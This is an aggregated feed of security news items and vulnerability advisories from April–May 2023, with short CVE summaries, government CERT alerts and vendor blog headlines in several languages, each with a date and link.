CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting) Teltonika’s Remote Management System versions prior to 4.10.0 contain a cross-site scripting (XSS) vulnerability in the main page of the web interface. An attacker with the MAC address and serial number of a connected device could send a maliciously crafted JSON file with an HTML object to trigger the vulnerability. This could allow the attacker to execute scripts in the account context and obtain remote code execution on managed devices. Read more: “Triple Threat: Breaking Teltonika Routers Three Ways”

https://claroty.com/team82/disclosure-dashboard/cve-2023-2587
CVE-2023-2586
2023-05-11T00:00:00Z | 1683763200

CWE-287: Improper Authentication Teltonika’s Remote Management System versions 4.14.0 is vulnerable to an unauthorized attacker registering previously unregistered devices through the RMS platform. If the user has not disabled the "RMS management feature" enabled by default, then an attacker could register that device to themselves. This could enable the attacker to perform different operations on the user's devices, including remote code execution with 'root' privileges (using the 'Task Manager' feature on RMS). Read more: “Triple Threat: Breaking Teltonika Routers Three Ways”

https://claroty.com/team82/disclosure-dashboard/cve-2023-2586
Why more transparency around cyber attacks is a good thing for everyone
2023-05-10T14:22:36Z | 1683728556

Eleanor Fairford, Deputy Director of Incident Management at the NCSC, and Mihaela Jembei, Director of Regulatory Cyber at the Information Commissioner’s Office (ICO), reflect on why it’s so concerning when cyber attacks go unreported – and look at some of the misconceptions about how organisations respond to them.

https://www.ncsc.gov.uk/blog-post/why-more-transparency-around-cyber-attacks-is-a-good-thing-for-everyone
From One Vulnerability to Another: Outlook Patch Analysis Reveals Important Flaw in Windows API
2023-05-10T14:00:00Z | 1683727200

https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api
Olukord küberruumis – aprill 2023
2023-05-10T08:59:06Z | 1683709146

Aprillis registreerisime 230 mõjuga intsidenti, mis on viimase poole aasta keskmisel tasemel.

https://ria.ee/uudised/olukord-kuberruumis-aprill-2023
RIA lõpetab enda arendatavas tarkvaras BDOC-TM digiallkirja vormingu loomise toetamise
2023-05-10T07:21:03Z | 1683703263

BDOC-TM vormingus digiallkirjade loomise toetamine lõpetatakse teekides libdigidocpp ja DigiDoc4j tänavu juunis avalikustatavates uutes versioonides.

https://ria.ee/uudised/ria-lopetab-enda-arendatavas-tarkvaras-bdoc-tm-digiallkirja-vormingu-loomise-toetamise
The National Cyber Security Centre Finland’s weekly review – 18/2023
2023-05-10T06:41:20Z | 1683700880

This week we talk about top Finnish cyber security expertise and cooperation, which got on stage at one of the largest information security events in the world. We also take a summary look at currently circulating scams and phishing campaigns.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-182023
The National Cyber Security Centre Finland’s weekly review – 18/2023
2023-05-10T06:41:20Z | 1683700880

This week we talk about top Finnish cyber security expertise and cooperation, which got on stage at one of the largest information security events in the world. We also take a summary look at currently circulating scams and phishing campaigns.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-182023
High Threat Security Alert (A23-05-05): Multiple Vulnerabilities in Microsoft Products (May 2023)
2023-05-10T04:00:00Z | 1683691200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-05-06): Multiple Vulnerabilities in Firefox
2023-05-10T04:00:00Z | 1683691200

Mozilla has published the advisories (MFSA2023-16 and MFSA2023-17) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Weston Embedded uC-FTPs PORT command parameter extraction out-of-bounds read vulnerability
2023-05-10T00:00:00Z | 1683676800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1681
Weston Embedded uC-FTPs Authentication authentication bypass vulnerability
2023-05-10T00:00:00Z | 1683676800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1680
CVE-2023-1731
2023-05-10T00:00:00Z | 1683676800

In LTOS versions prior to V7.06.013, the configuration file upload function would not correctly validate the input, which would allow an remote authenticated attacker with high privileges to execute arbitrary commands. The LANTIME firmware version 7.06.013 includes security updates of various third party libraries and programs.Meinberg recommends updating to LANTIME firmware version 7.06.013.

https://claroty.com/team82/disclosure-dashboard/cve-2023-1731
UK and allies expose Snake malware threat from Russian cyber actors
2023-05-09T14:01:31Z | 1683640891

Snake malware and its variants have been a core component in Russian operations carried out by Centre 16 of Russia’s Federal Security Service (FSB).

https://www.ncsc.gov.uk/news/uk-and-allies-expose-snake-malware-threat-from-russian-cyber-actors
Malspam campaign delivering PowerDash – a tiny PowerShell backdoor
2023-05-09T13:00:00Z | 1683637200

In late April we observed a malspam campaign delivering a previously unseen PowerShell malware. We decided to provide an overview of the campaign and some of the malware capabilities. We're also dubbing this malware family as "PowerDash" because of the "/dash" path on C2 server, used as a gateway for bots.

https://cert.pl/en/posts/2023/05/powerdash-malspam/
Security Alert (A23-05-04): Multiple Vulnerabilities in Microsoft Edge
2023-05-08T04:00:00Z | 1683518400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Investigating Undocumented Netcomms From Legitimate Chrome Extension
2023-05-05T20:13:38Z | 1683317618

Early this month, IronNet analytics detected an unusual HTTPS connection between internal resources and 173.231.16[.]76.

https://www.ironnet.com/blog/investigating-undocumented-netcomms-from-legitimate-chrome-extension
123456 again?! Why aren't we learning to address the human factor more successfully?
2023-05-05T00:00:00Z | 1683244800

People have become the main driver for breaches but the human factors remain insufficiently addressed in the IT security sector. We are working on changing that.

https://www.first.org/blog/20230505-123456-again
123456 again?! Why aren't we learning to address the human factor more successfully?
2023-05-05T00:00:00Z | 1683244800

People have become the main driver for breaches but the human factors remain insufficiently addressed in the IT security sector. We are working on changing that.

https://www.first.org/blog/20230505-123456-again
Hot Topics at Healthcare Conferences: From AI to Cyber Insurance Costs
2023-05-04T13:00:00Z | 1683205200

https://www.akamai.com/blog/security/hot-topics-at-healthcare-conferences
Eile ilmnenud tõrked Chrome'i ja Edge'iga said lahendatud, Windows'i kasutajad peavad uuendama ID-tarkvara
2023-05-04T12:50:15Z | 1683204615

Eile, 3. mail ilmnenud tõrked Chrome'i ja Edge'iga said lahendatud, Windows'i kasutajad peavad uuendama ID-tarkvara.

https://ria.ee/uudised/eile-ilmnenud-torked-chromei-ja-edgeiga-said-lahendatud-windowsi-kasutajad-peavad-uuendama
Security Alert (A23-05-03): Multiple Vulnerabilities in Fortinet Products
2023-05-04T04:00:00Z | 1683172800

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Google Chrome WebRTC RTCStatsCollector out of bounds memory access vulnerability
2023-05-04T00:00:00Z | 1683158400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1693
Publicado Relatório Tecnologias Emergentes, do Observatório de Cibersegurança
2023-05-04T00:00:00Z | 1683158400

Observatório de Cibersegurança do CNCS acaba de publicar o Relatório Tecnologias Emergentes, através do qual disponibiliza uma análise sobre cinco tecnologias que podem ajudar a formar o presente e o futuro tecnológicos, nomeadamente a Computação em Nuvem, a Internet das Coisas, a Inteligência Artificial, a Tecnologia 5G e as Tecnologias Quânticas. Este documento apresenta-se segundo dois prismas. Por um lado, estas tecnologias são abordadas numa perspetiva histórica e considerando os seus principais impactos. Por outro, salientam-se neste contexto os aspetos destas tecnologias ligados à cibersegurança, designadamente os desafios e as oportunidades que elas colocam à segurança no ciberespaço.As considerações que emanam deste Relatório permitem integrar a cibersegurança no quadro destas tecnologias, bem como identificar linhas de ação possíveis para uma implementação mais segura destes tipos de sistemas técnicos.Consulte o relatório aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135772/publicado-relatorio-tecnologias-emergentes-do-observatorio-de-ciberseguranca
CVE-2023-31185
2023-05-04T00:00:00Z | 1683158400

Misconfiguration may allow information disclosure via an unspecified request.

https://claroty.com/team82/disclosure-dashboard/cve-2023-31185
CVE-2023-31184
2023-05-04T00:00:00Z | 1683158400

CWE-798: Use of Hard-coded Credentials Misconfiguration may allow information disclosure via an unspecified request.

https://claroty.com/team82/disclosure-dashboard/cve-2023-31184
CVE-2022-4945
2023-05-04T00:00:00Z | 1683158400

CWE-256 Plaintext Storage of a Password The DataProbe cloud usernames and passwords are stored in plain text in a specific file. Any user able to read this specific file from the device could compromise other devices connected to the user's cloud.

https://claroty.com/team82/disclosure-dashboard/cve-2022-4945
CVE-2022-47320
2023-05-04T00:00:00Z | 1683158400

CWE-288 Authentication Bypass using an Alternative Path or Channel The iBoot device’s basic discovery protocol assists in initial device configuration. The discovery protocol shows basic information about devices on the network and allows users to perform configuration changes.

https://claroty.com/team82/disclosure-dashboard/cve-2022-47320
CVE-2022-47311
2023-05-04T00:00:00Z | 1683158400

CWE-288 Authentication Bypass Using an Alternate Path or Channel A proprietary protocol for iBoot devices is used for control and keepalive commands. The function compares the username and password and also contains the configuration data for the user specified. If the user does not exist, then it sends a value for username and password, which allows successful authentication for a connection.

https://claroty.com/team82/disclosure-dashboard/cve-2022-47311
CVE-2022-46738
2023-05-04T00:00:00Z | 1683158400

CWE-1391 Use of Weak Credentials The affected product exposes multiple sensitive data fields of the affected product. An attacker can use the SNMP command to get a device MAC address and login as the administrator.

https://claroty.com/team82/disclosure-dashboard/cve-2022-46738
CVE-2022-46658
2023-05-04T00:00:00Z | 1683158400

CWE-121 Stack-Based Buffer Overflow The affected product is vulnerable to a stack-based buffer overflow, which could lead to a denial-of-service condition or remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2022-46658
Akamai Integrates DNS Security with Microsoft's Azure Firewall to Protect Cloud Workloads
2023-05-03T13:00:00Z | 1683118800

https://www.akamai.com/blog/security/akamai-integrates-dns-security-microsofts-azure-firewall
Uues Chrome'i versioonis ja peatselt avalikustatavas Edge'i versioonis on ID-kaardi kasutamine häiritud
2023-05-03T11:07:13Z | 1683112033

Uues Chrome'i versioonis ja peatselt avalikustatavas Edge'i versioonis on Windowsi operatsioonisüsteemis ID-kaardi kasutamine häiritud

https://ria.ee/uudised/uues-chromei-versioonis-ja-peatselt-avalikustatavas-edgei-versioonis-id-kaardi-kasutamine
RIA sulgeb 1. novembrist eesnimi.perekonnanimi@eesti.ee e-posti teenuse
2023-05-03T08:12:56Z | 1683101576

Riigi Infosüsteemi Amet (RIA) sulgeb 1. novembrist 2023 erakirjavahetuseks loodud e-posti teenuse, mille tulemusel ei ole sellest hetkest enam võimalik kasutada eesnimi.perekonnanimi@eesti.ee ja ettevõttenimi@eesti.ee aadressi. Otsus ei puuduta ametlikke e-posti aadresse isikukood@eesti.ee ja registrikood@eesti.ee, kuhu saavad teateid saata ainult riigiasutused.

https://ria.ee/uudised/ria-sulgeb-1-novembrist-eesnimiperekonnanimieestiee-e-posti-teenuse
Security Alert (A23-05-02): Multiple Vulnerabilities in Google Chrome
2023-05-03T04:00:00Z | 1683086400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Já está disponível o terceiro episódio do podcast do CNCS "Comunicar Cibersegurança"
2023-05-03T00:00:00Z | 1683072000

O terceiro episódio do podcast do CNCS aborda o tema da gestão do risco, à conversa com Fernando Mendes, sócio fundador da GDPR.pt e da Focus2Comply. A gestão do risco é fundamental para as organizações definirem de forma sistematizada os principais riscos que enfrentam, de modo a mitigá-los, considerando o seu contexto, as prioridades e os níveis de ameaça. Esta preocupação também se aplica à cibersegurança e resulta em algumas das obrigações legais em vigor, no âmbito do Regime Jurídico da Segurança do Ciberespaço e da respetiva regulamentação.O CNCS disponibilizou recentemente um Guia para a Gestão dos Riscos que permite apoiar as organizações nesta matéria. Esta e outras questões são tratadas nesta interessante conversa, moderada por Ruth Ferrony, do CNCS.Assista ao podcast aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135771/ja-esta-disponivel-o-terceiro-episodio-do-podcast-do-cncs-comunicar-ciberseguranca
CVE-2023-31048
2023-05-03T00:00:00Z | 1683072000

CWE-209: Generation of Error Message Containing Sensitive Information A vulnerability in the OPC UA .NET Standard Reference Server allows remote attackers to send malicious requests that expose sensitive information. The information exposed is stack trace information from code that is publicly available. This means the information is less likely to be useful to malicious actors.

https://claroty.com/team82/disclosure-dashboard/cve-2023-31048
CVE-2023-27321
2023-05-03T00:00:00Z | 1683072000

CWE-1325: Improperly Controlled Sequential Memory Allocation A vulnerability in the OPC UA .NET Standard Reference Server allows remote attackers to send malicious requests that consume all memory available to the server.

https://claroty.com/team82/disclosure-dashboard/cve-2023-27321
The National Cyber Security Centre Finland’s weekly review – 17/2023
2023-05-02T08:33:11Z | 1683016391

This week we talk about technical support scam calls and phishing messages impersonating the suomi.fi service.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-172023
The National Cyber Security Centre Finland’s weekly review – 17/2023
2023-05-02T08:33:11Z | 1683016391

This week we talk about technical support scam calls and phishing messages impersonating the suomi.fi service.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-172023
AkaRank: Improving Popularity Rankings for Better Threat Intelligence, Part 2
2023-05-02T05:00:00Z | 1683003600

https://www.akamai.com/blog/security/improving-threat-intelligence-part-2-introducing-akarank
Security Alert (A23-05-01): Multiple Vulnerabilities in Android
2023-05-02T04:00:00Z | 1683000000

Google has released Android Security Bulletin May 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-27370
2023-05-02T00:00:00Z | 1682985600

This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR RAX30 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of device configuration. The issue results from the storage of configuration secrets in plaintext. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Read more: Chaining Five Vulnerabilities to Exploit NETGEAR Nighthawk RAX30 Routers

https://claroty.com/team82/disclosure-dashboard/cve-2023-27370
CVE-2023-27369
2023-05-02T00:00:00Z | 1682985600

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR RAX30. Authentication is not required to exploit this vulnerability. The specific flaw exists within the soap_serverd binary. When parsing the request headers, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to bypass authentication on the system. Read more: Chaining Five Vulnerabilities to Exploit NETGEAR Nighthawk RAX30 Routers

https://claroty.com/team82/disclosure-dashboard/cve-2023-27369
CVE-2023-27368
2023-05-02T00:00:00Z | 1682985600

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR RAX30 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the soap_serverd binary. When parsing SOAP message headers, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to bypass authentication on the system. Read more: Chaining Five Vulnerabilities to Exploit NETGEAR Nighthawk RAX30 Routers

https://claroty.com/team82/disclosure-dashboard/cve-2023-27368
CVE-2023-27367
2023-05-02T00:00:00Z | 1682985600

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR RAX30 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the libcms_cli module. The issue results from the lack of proper validation of a user-supplied command before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Read more: Chaining Five Vulnerabilities to Exploit NETGEAR Nighthawk RAX30 Routers

https://claroty.com/team82/disclosure-dashboard/cve-2023-27367
CVE-2023-27357
2023-05-02T00:00:00Z | 1682985600

This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR RAX30 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of SOAP requests. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose sensitive information, leading to further compromise. Read more: Chaining Five Vulnerabilities to Exploit NETGEAR Nighthawk RAX30 Routers

https://claroty.com/team82/disclosure-dashboard/cve-2023-27357
IronNet Monthly Global Threat
2023-05-01T21:27:23Z | 1682976443

While much of the cybersecurity world’s focus has been on attacks related to the Russian-Ukraine war, there is an urgent need to raise awareness about the growing threat of a barrage of “digital strikes” by China against the United States, particularly if the conflict over Taiwan deepens, suggests Congressional Rep. Mike Gallagher (R-Wis.), chair of the House Select Committee on China. In line with our ongoing tracking of the threat of Chinese cyber attacks, we agree that it is critical to take note of a cyber strategy by China to target critical infrastructure on U.S. soil such as military and transportation networks as well as in the energy, water, financial markets, and business sectors, as mentioned in this recent Politicoarticle.

https://www.ironnet.com/blog/ironnet-monthly-global-threat-april-2023
Zero Trust: Better Cybersecurity Insurance and Lower Healthcare Costs
2023-05-01T13:00:00Z | 1682946000

https://www.akamai.com/blog/cloud/zero-trust-better-cybersecurity-insurance-lower-healthcare-costs
The Best Defense Is ATT&CK: Applying MITRE ATT&CK To Your Organization
2023-04-30T11:20:28Z | 1682853628

The post The Best Defense Is ATT&CK: Applying MITRE ATT&CK To Your Organization appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-the-best-defense-is-attack
Render Pages Faster for Optimized Browsing, Part 5 of 5
2023-04-28T13:00:00Z | 1682686800

Find out what happens once the browser has downloaded usable assets and it's time to display something on-screen.

https://www.akamai.com/blog/developers/render-pages-faster-optimized-browsing-part-5-of-5
Ambushed by AngularJS: a hidden CSP bypass in Piwik PRO
2023-04-28T12:00:00Z | 1682683200

Any individual website component can undermine the security of the entire site, and analytics platforms are no exception. With this in mind, we decided to do a quick audit of Piwik PRO to make sure it

https://portswigger.net/research/ambushed-by-angularjs-a-hidden-csp-bypass-in-piwik-pro
Welcome to Thinkst Canary security advisories
2023-04-28T00:00:00Z | 1682640000

No advisories at present. You can report a security issue here.

https://canary.tools/security-advisories
Akamai and the Adoption of Post-Quantum Cryptography
2023-04-27T13:00:00Z | 1682600400

https://www.akamai.com/blog/security/akamai-and-post-quantum-cryptography
Veel selle nädala lõpuni saab anda oma panuse tehisaju eesti keele oskuse arendamisse
2023-04-26T08:59:36Z | 1682499576

Mullu sügisel ellu kutsutud „Anneta kõnet“ kampaania raames on võimalik kõigil oma kõnet annetada, et panusta eesti keele säilimisse ning luua uusi võimalusi inimeste ja tehnoloogia vaheliseks suhtluseks, mis muudab meie igapäevaelu lihtsamaks ja tõhusamaks.

https://ria.ee/uudised/veel-selle-nadala-lopuni-saab-anda-oma-panuse-tehisaju-eesti-keele-oskuse-arendamisse
Security Alert (A23-04-18): Multiple Vulnerabilities in VMware Products
2023-04-26T04:00:00Z | 1682481600

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-04-19): Vulnerability in TP-Link Archer AX21
2023-04-26T04:00:00Z | 1682481600

TP-Link released a security update to address a vulnerability in TP-Link Archer AX21.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Advisory - System Command Injection Vulnerability in a Huawei Printer Product
2023-04-26T00:00:00Z | 1682467200

//www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-sciviahpp-6bcddec5-en
Security Advisory - Identity Authentication Bypass Vulnerability in Huawei HiLink AI Life Product
2023-04-26T00:00:00Z | 1682467200

//www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-iabvihhalp-ea34d670-en
Security Advisory - Misinterpretation of Input Vulnerability in Huawei Printer
2023-04-26T00:00:00Z | 1682467200

//www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-moivihp-73cabdde-en
Security Advisory - Misinterpretation of Input Vulnerability in Huawei Printer
2023-04-26T00:00:00Z | 1682467200

//www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-moivihp-2f201af9-en
Our Journey with FlexBase Emissions
2023-04-25T13:00:00Z | 1682427600

https://www.akamai.com/blog/sustainability/journey-flexbase-emissions
Akamai Prolexic Now Comes With a Network Cloud Firewall
2023-04-25T13:00:00Z | 1682427600

https://www.akamai.com/blog/security/akamai-prolexic-comes-with-network-cloud-firewall
The National Cyber Security Centre Finland’s weekly review – 16/2023
2023-04-25T12:10:39Z | 1682424639

This week we talk about an active secure email phishing campaign and the rise of the cyber threat level in Europe.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-162023
The National Cyber Security Centre Finland’s weekly review – 16/2023
2023-04-25T12:10:39Z | 1682424639

This week we talk about an active secure email phishing campaign and the rise of the cyber threat level in Europe.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-162023
What should governments consider when getting involved with blockchain?
2023-04-25T11:00:57Z | 1682420457

Last September, Principal Security Engineer Dr. Evan Sultanik was on a panel hosted by the Naval Postgraduate School’s Distributed Consensus: Blockchain & Beyond (DC:BB) movement, where faculty and students there are seeking opportunities to learn and share knowledge, research, funding, and events focused on distributed consensus technologies. The panel of nine government, academia, and industry […]

https://blog.trailofbits.com/2023/04/25/loose-code-sinks-nodes/
Eesti.ee uus eraisiku töölaud toob teenused mugavalt kätte
2023-04-25T08:07:53Z | 1682410073

Riigiportaalis eesti.ee saavad nüüdsest eraisikud kasutada personaalset töölauda, kuhu on teemapõhiselt koondatud enimotsitud teenused, alates dokumentidest ja ravimiretseptidest, lõpetades sõidukite ja kinnisvaraga.

https://ria.ee/uudised/eestiee-uus-eraisiku-toolaud-toob-teenused-mugavalt-katte
Why We Built Flashpoint Ignite: Unity, Power, and Performance
2023-04-24T15:15:23Z | 1682349323

Flashpoint's Chief Product and Engineering Officer, Patrick Gardner, introduces Flashpoint Ignite—our new platform to accelerate cross-functional threat detection and risk mitigation for CTI, Vulnerability, National Security, and Physical Security teams The post Why We Built Flashpoint Ignite: Unity, Power, and Performance appeared first on Flashpoint.

https://flashpoint.io/blog/why-we-built-flashpoint-ignite/
Akamai Brand Protector Solves the Growing Problem of Impersonation Attacks
2023-04-24T13:00:00Z | 1682341200

https://www.akamai.com/blog/security/akamai-brand-protector-solves-impersonation-attacks
Q&A Chat with Eyal Webber-Zvik on Cato RBI
2023-04-24T12:45:33Z | 1682340333

Today Cato Networks announced the addition of the Cato RBI to our Cato SASE Cloud platform. It is an exciting day for us and for our customers. Why? Because Cato’s cloud-native, security stack just got better, and without any added complexity.   I sat down with Eyal Webber-Zvik, Vice President of Product Marketing and Strategic Alliances... The post Q&A Chat with Eyal Webber-Zvik on Cato RBI  appeared first on Cato Networks.

https://www.catonetworks.com/blog/qa-chat-with-eyal-webber-zvik-on-cato-rbi/
Rainy cyber weather in March due to high numbers of data breaches and scams
2023-04-24T09:34:18Z | 1682328858

Cyber weather in March was rainier than in February. The increase in the number of data breach reports and the numerous rent scam messages sent in early March caused some storm clouds to gather.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_03/2023
Rainy cyber weather in March due to high numbers of data breaches and scams
2023-04-24T09:34:18Z | 1682328858

Cyber weather in March was rainier than in February. The increase in the number of data breach reports and the numerous rent scam messages sent in early March caused some storm clouds to gather.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_03/2023
High Threat Security Alert (A23-04-17): Multiple Vulnerabilities in Microsoft Edge
2023-04-24T04:00:00Z | 1682308800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
IBM Corporation AIX invscout SetUID Binary OS Command Injection Vulnerability
2023-04-24T00:00:00Z | 1682294400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691
IBM Corporation AIX errlog() Log Injection Vulnerability
2023-04-24T00:00:00Z | 1682294400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1690
The Risk-Reducing Power of Flashpoint Video Search
2023-04-21T17:03:27Z | 1682096607

An industry first, Flashpoint’s video search capability can surface logos, text, explicit content, and other critical media for CTI, Fraud, Brand Protection, and Physical Security teams The post The Risk-Reducing Power of Flashpoint Video Search appeared first on Flashpoint.

https://flashpoint.io/blog/video-search-analysis-intelligence/
Embracing Change with Akamai Connected Cloud
2023-04-21T13:00:00Z | 1682082000

https://www.akamai.com/blog/sustainability/embracing-change-with-akamai-connected-cloud
What?s New for Developers: April 2023
2023-04-21T13:00:00Z | 1682082000

https://www.akamai.com/blog/developers/whats-new-for-developers-april-2023
Cyber threat level remains elevated, targeted attacks have become more frequent
2023-04-21T12:06:53Z | 1682078813

Attackers are increasingly interested in Finnish organisations. The nature of cyber attacks has also changed with the number of targeted attacks against carefully selected target organisations increasing, in particular. Despite the increase in incident volumes, Traficom and the Finnish Security and Intelligence Service (Supo) consider it unlikely that a cyber attack would paralyse the Finnish society.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-threat-level-remains-elevated-targeted-attacks-have-become-more-frequent
Cyber threat level remains elevated, targeted attacks have become more frequent
2023-04-21T12:06:53Z | 1682078813

Attackers are increasingly interested in Finnish organisations. The nature of cyber attacks has also changed with the number of targeted attacks against carefully selected target organisations increasing, in particular. Despite the increase in incident volumes, Traficom and the Finnish Security and Intelligence Service (Supo) consider it unlikely that a cyber attack would paralyse the Finnish society.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-threat-level-remains-elevated-targeted-attacks-have-become-more-frequent
High Threat Security Alert (A23-04-16): Multiple Vulnerabilities in VMware Aria Operations for Logs
2023-04-21T04:00:00Z | 1682049600

VMware has published a security advisory to address multiple vulnerabilities in VMware Aria Operations for Logs.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Announces Advanced Bot Detections, Global Recognition of Entities
2023-04-20T13:00:00Z | 1681995600

https://www.akamai.com/blog/security/akamai-announces-advanced-bot-detections
Typos that omit security features and how to test for them
2023-04-20T11:00:08Z | 1681988408

During a security audit, I discovered an easy-to-miss typo that unintentionally failed to enable _FORTIFY_SOURCE, which helps detect memory corruption bugs in incorrectly used C functions. We searched, found, and fixed twenty C and C++ bugs on GitHub with this same pattern. Here is a list of some of them related […]

https://blog.trailofbits.com/2023/04/20/typos-that-omit-security-features-and-how-to-test-for-them/
UK and international partners publish joint guidance to help communities create secure smart cities
2023-04-20T09:42:23Z | 1681983743

New guide, published during CYBERUK 2023, sets out cyber security best practices for creating connected places.

https://www.ncsc.gov.uk/news/uk-international-partners-joint-guidance-help-create-secure-smart-cities
RIA värskendas ID-tarkvara
2023-04-20T08:17:32Z | 1681978652

Riigi Infosüsteemi Amet avaldas 19. aprillil ID-tarkvara uue versiooni (2023.3), mis muude uuenduste seas ei sisalda enam isikut tõendava dokumendi foto allalaadimise võimalust.

https://ria.ee/uudised/ria-varskendas-id-tarkvara-0
High Threat Security Alert (A23-04-14): Multiple Vulnerabilities in Cisco Products
2023-04-20T04:00:00Z | 1681963200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-04-15): Vulnerability in Drupal
2023-04-20T04:00:00Z | 1681963200

Drupal has released security advisories to address a vulnerability in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Slic3r libslic3r TriangleMesh clone heap-based buffer overflow vulnerability
2023-04-20T00:00:00Z | 1681948800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1593
Phishing: The Oldest and Wisest Attack Vector
2023-04-19T13:00:00Z | 1681909200

https://www.akamai.com/blog/security/phishing-oldest-wisest-attack-vector
The Enterprise Network Cookbook
2023-04-19T11:11:06Z | 1681902666

An enterprise network strategy helps organizations maximize connectivity between end-user devices and applications so they can achieve positive business outcomes. But not all organizations know how to build a comprehensive enterprise network strategy on their own. A new report by Gartner guides Infrastructure & Operations (I&O) leaders in creating a dynamic enterprise network strategy that... The post The Enterprise Network Cookbook appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-enterprise-network-cookbook/
The National Cyber Security Centre Finland’s weekly review – 15/2023
2023-04-19T06:59:25Z | 1681887565

This week, we will be talking about data breaches on social media accounts and ID phishing on Microsoft M365 user accounts. Patch Tuesday featured many updates – remember to update your device!

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-152023
The National Cyber Security Centre Finland’s weekly review – 15/2023
2023-04-19T06:59:25Z | 1681887565

This week, we will be talking about data breaches on social media accounts and ID phishing on Microsoft M365 user accounts. Patch Tuesday featured many updates – remember to update your device!

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-152023
High Threat Security Alert (A23-04-12): Multiple Vulnerabilities in Google Chrome
2023-04-19T04:00:00Z | 1681876800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-04-13): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2023)
2023-04-19T04:00:00Z | 1681876800

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Slipping Through the Security Gaps: The Rise of Application and API Attacks
2023-04-18T13:00:00Z | 1681822800

https://www.akamai.com/blog/security-research/the-rise-of-application-and-api-attacks
A Winter’s Tale: Improving messages and types in GDB’s Python API
2023-04-18T11:00:43Z | 1681815643

As a winter associate at Trail of Bits, my goal was to make two improvements to the GNU Project Debugger (GDB): make it run faster and improve its Python API to support and improve tools that rely on it, like Pwndbg. The main goal was to run […]

https://blog.trailofbits.com/2023/04/18/a-winters-tale-improving-types-and-messages-in-gdbs-python-api/
UK and US issue warning about APT28 actors exploiting poorly maintained Cisco routers
2023-04-18T07:18:50Z | 1681802330

Joint advisory calls on organisations to secure devices to prevent network attacks.

https://www.ncsc.gov.uk/news/uk-and-us-issue-warning-about-apt28-actors-exploiting-poorly-maintained-cisco-routers
Simplify Access Security: Integrate ZTNA with Your Cloud Identity Solution
2023-04-17T13:00:00Z | 1681736400

https://www.akamai.com/blog/security/simplify-access-security-integrate-ztna
Novo Fascículo da Cartilha de Segurança para Internet
2023-04-17T11:00:00Z | 1681729200

